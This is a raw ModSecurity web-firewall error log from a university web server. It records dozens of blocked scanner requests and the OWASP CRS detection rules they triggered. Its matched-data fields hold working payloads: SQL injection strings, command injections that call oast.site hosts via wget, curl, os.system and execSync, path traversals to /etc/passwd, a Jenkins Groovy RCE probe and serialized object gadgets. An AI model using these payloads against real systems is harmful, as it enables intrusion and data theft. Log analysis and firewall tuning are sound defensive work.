\\x0a\\x0a\\x0a\\x0a\\x0arO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\\x0agetUnsavedChanges\\x0arO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubm..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTA [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO108cCo-f0AAARNk6kAAAAS"]
[Tue Aug 29 11:32:49.502996 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:<?xml version. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22?> < found within ARGS:<?xml version: \\x221.0\\x22 encoding=\\x22ISO-8859-1\\x22?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>a:1:{S:4:\\x22what\\x22;O:11:\\x22Pdp\\x5cUri\\x5cUrl\\x22:1:{S:17:\\x22\\x5c00Pdp\\x5c5CUri\\x5c5CUrl\\x5c00host\\x22;O:21:\\x22League\\x5cFlysystem\\..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/adxmlrpc.php"] [unique_id "ZO108cCo-f0AAAQKOf8AAAAs"]
[Tue Aug 29 11:32:51.477172 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: union select found within ARGS:id: -1 union select md5(999999999)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/admin/ajax/avatar.php"] [unique_id "ZO1088Co-f0AAARMMe4AAAAR"]
[Tue Aug 29 11:32:59.337308 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/glpi/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARH7LIAAAAM"]
[Tue Aug 29 11:32:59.396741 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cycle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ,(@@ found within ARGS:cycle: 1 UNION ALL SELECT 1,(@@version)-- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/scripts/unlock_tasks.php"] [unique_id "ZO10@8Co-f0AAARH7LUAAAAM"]
[Tue Aug 29 11:32:59.784430 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:token. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:token: `wget http:/cjmn8l5jmimk2adbbnlg4kw7iyjsc8s4u.oast.site`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/storfs-asup"] [unique_id "ZO10@8Co-f0AAARQ34cAAAAB"]
[Tue Aug 29 11:33:05.788738 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ')\\x0a@ found within ARGS:value: @GrabConfig(disableChecksums=true)\\x0a@GrabResolver(name='test', root='http://aaa')\\x0a@Grab(group='package', module='vulntest', version='1')\\x0aimport Payload;"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile"] [unique_id "ZO11AcCo-f0AAARR25YAAAAF"]
[Tue Aug 29 11:33:09.407684 2023] [:error] [pid 1100] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  -- - found within ARGS:username: ' OR 1=1 -- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/classes/Login.php"] [unique_id "ZO11BcCo-f0AAARMMfsAAAAR"]
[Tue Aug 29 11:33:09.899901 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/app"] [unique_id "ZO11BcCo-f0AAARD1SAAAAAH"]
[Tue Aug 29 11:33:10.350745 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:Form1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: $ found within ARGS:Form1: $TextField$0,$Submit,$Submit$0"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repositoryfeb.unla.ac.id"] [uri "/app"] [unique_id "ZO11BsCo-f0AAARQ358AAAAB"]
[Tue Aug 29 11:33:11.316021 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARNk8gAAAAS"]
[Tue Aug 29 11:33:12.543096 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAANsAcYAAAAD"]
[Tue Aug 29 11:33:12.600125 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg8i6gozbgrsugk.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg8i6gozbgrsugk.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARTELsAAAAG"]
[Tue Aug 29 11:33:12.786954 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARD1TUAAAAH"]
[Tue Aug 29 11:33:12.803462 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgje6j9sq1no84n.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgje6j9sq1no84n.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARQ364AAAAB"]
[Tue Aug 29 11:33:13.297289 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgeuzka8dq48puq.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgeuzka8dq48puq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARTEMIAAAAG"]
[Tue Aug 29 11:33:13.336471 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgcubmdhcuu4xic.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgcubmdhcuu4xic.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repositoryfeb.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARNk9UAAAAS"]
[Tue Aug 29 11:33:14.404530 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARdiHQAAAAK"]
[Tue Aug 29 11:33:14.483863 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARTEMoAAAAG"]
[Tue Aug 29 11:33:14.583384 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARQ37YAAAAB"]
[Tue Aug 29 11:33:17.465012 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgginuzsdunwhke.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DcCo-f0AAARR28oAAAAF"]
[Tue Aug 29 11:33:18.735320 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlg58gezijnrgqdd.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARnmH4AAAAR"]
[Tue Aug 29 11:33:19.039110 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARt-8AAAAAV"]
[Tue Aug 29 11:33:19.059282 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11D8Co-f0AAARH7OkAAAAM"]
[Tue Aug 29 11:33:19.315603 2023] [:error] [pid 1142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAAR2Z20AAAAe"]
[Tue Aug 29 11:33:19.336311 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARQ380AAAAB"]
[Tue Aug 29 11:33:20.304949 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repositoryfeb.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARwurIAAAAZ"]
[Tue Aug 29 11:33:21.366150 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EcCo-f0AAARv7P4AAAAY"]
[Tue Aug 29 11:33:22.417389 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:document. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:document: this.constructor.constructor(\\x22return process\\x22)().mainModule.require(\\x22child_process\\x22).execSync(\\x22curl cjmn8l5jmimk2adbbnlgmisydrx67kgor.oast.site\\x22)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/checkValid"] [unique_id "ZO11EsCo-f0AAARR29gAAAAF"]
[Tue Aug 29 11:33:23.299940 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:postids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:postids: -1'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repositoryfeb.unla.ac.id"] [uri "/forumrunner/request.php"] [unique_id "ZO11E8Co-f0AAARwur0AAAAZ"]
